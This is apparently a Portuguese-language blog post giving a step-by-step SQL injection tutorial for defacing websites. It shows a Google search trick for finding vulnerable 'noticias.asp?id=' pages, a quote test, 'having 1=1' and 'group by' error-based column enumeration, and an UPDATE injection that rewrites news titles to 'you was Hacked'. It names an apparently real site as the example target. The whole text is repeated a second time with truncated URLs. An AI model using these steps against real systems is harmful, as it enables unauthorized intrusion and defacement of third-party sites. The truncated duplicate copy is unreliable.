Primeiramente abra o
www.google.com.br
depois no campo de busca digite:
allinurl: noticias.asp?id=
ps: pra quem não sabe esse ‘allinurl’ serve para buscar na url dos sites ‘noticias.asp?id=’
escolha um dos sites que aparecer e entre.
por exemplo:
http://www.corretorimoveis.com.br/no…cod_noticia=65
quando o site abrir vc vai adicionar uma aspa simples no final da sua url, ficando assim:
http://www.corretorimoveis.com.br/noticias …noticia=65‘
se retornar um erro parecido com este abaixo é pq o site em questão é vulnerável a SQL INJECTION:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.
/noticias.asp, line 152
o que fazer agora ?
vamos colocar uma string na url para retornar msgs de erro do qual iremos descobrir os campos da tabela.
http://www.corretorimoveis.com.br/no…cod_noticia=65 having 1=1
resultado:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Noticias.Cod_Noticia’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
‘
/noticias.asp, line 152
voce pode ficar fazendo isto para pegar todos os campos da tabela, é so colocar a virgula entre os campos já encontrados. por exemplo:
http://www.corretorimoveis.com.br/no…cod_noticia=65 group by Noticias.Cod_Noticia, Noticias.Tit_Noticia
Já encontramos o campo Tit_Noticia que faz referencia ao titula das noticias.
Para alterar o titulo e concluir o ataque é so fazer o seguinte:
Código PHP:
http://www.corretorimoveis.com.br/noticias …Noticias+set+Ti t_Noticia=’you was Hacked’
Só isso.Depois é so atualizar a pagina que já estará hackeado
bom pessoal é simples..
Creditos : By : Trakinas
________________________________________________
? ?●๋•ѕє¢яєт нα¢кєя●๋• ? ?
? Recuse Imitaçoes ™
www.google.com.br
depois no campo de busca digite:
allinurl: noticias.asp?id=
ps: pra quem não sabe esse ‘allinurl’ serve para buscar na url dos sites ‘noticias.asp?id=’
escolha um dos sites que aparecer e entre.
por exemplo:
http://www.corretorimoveis.com.br/no…co
quando o site abrir vc vai adicionar uma aspa simples no final da sua url, ficando assim:
http://www.corretorimoveis.com.br/notic
se retornar um erro parecido com este abaixo é pq o site em questão é vulnerável a SQL INJECTION:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Unclosed quotation mark before the character string ”.
/noticias.asp, line 152
o que fazer agora ?
vamos colocar uma string na url para retornar msgs de erro do qual iremos descobrir os campos da tabela.
http://www.corretorimoveis.com.br/no…co
resultado:
Microsoft OLE DB Provider for ODBC Drivers error ‘80040e14'
[Microsoft][ODBC SQL Server Driver][SQL Server]Column ‘Noticias.Cod_Noticia’ is invalid in the select list because it is not contained in an aggregate function and there is no GROUP BY clause.
‘
/noticias.asp, line 152
voce pode ficar fazendo isto para pegar todos os campos da tabela, é so colocar a virgula entre os campos já encontrados. por exemplo:
http://www.corretorimoveis.com.br/no…co
Já encontramos o campo Tit_Noticia que faz referencia ao titula das noticias.
Para alterar o titulo e concluir o ataque é so fazer o seguinte:
Código PHP:
http://www.corretorimoveis.com.br/notic
Só isso.Depois é so atualizar a pagina que já estará hackeado
bom pessoal é simples..
Creditos : By : Trakinas
________________________________________
? ?●๋•ѕє¢яєт нα¢кєя●๋• ? ?
? Recuse Imitaçoes ™
0 comentários:
Postar um comentário